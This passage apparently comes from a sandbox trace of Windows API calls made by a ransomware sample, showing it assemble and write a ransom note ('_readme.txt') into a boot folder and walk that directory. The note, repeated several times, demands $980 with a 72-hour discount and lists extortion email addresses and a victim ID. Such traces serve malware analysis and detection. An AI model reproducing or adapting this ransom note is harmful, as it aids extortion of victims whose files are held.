\"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.270] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5e2e0 [0056.271] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\_readme.txt" (normalized: "c:\\boot\\nl-nl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.271] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.271] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x32acff0 [0056.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32acff0, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.271] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x326aa18 [0056.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.271] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.271] WriteFile (in: hFile=0x5c8, lpBuffer=0x326aa18*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x326aa18*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.272] CloseHandle (hObject=0x5c8) returned 1 [0056.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.272] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.272] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebde0d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebde0d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.273] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebde0d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebde0d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.273] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0056.273] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebde0d0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ebde0d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebde0d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.273] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebde0d0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ebde0d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebde0d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.273] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.273] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.274] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.277] 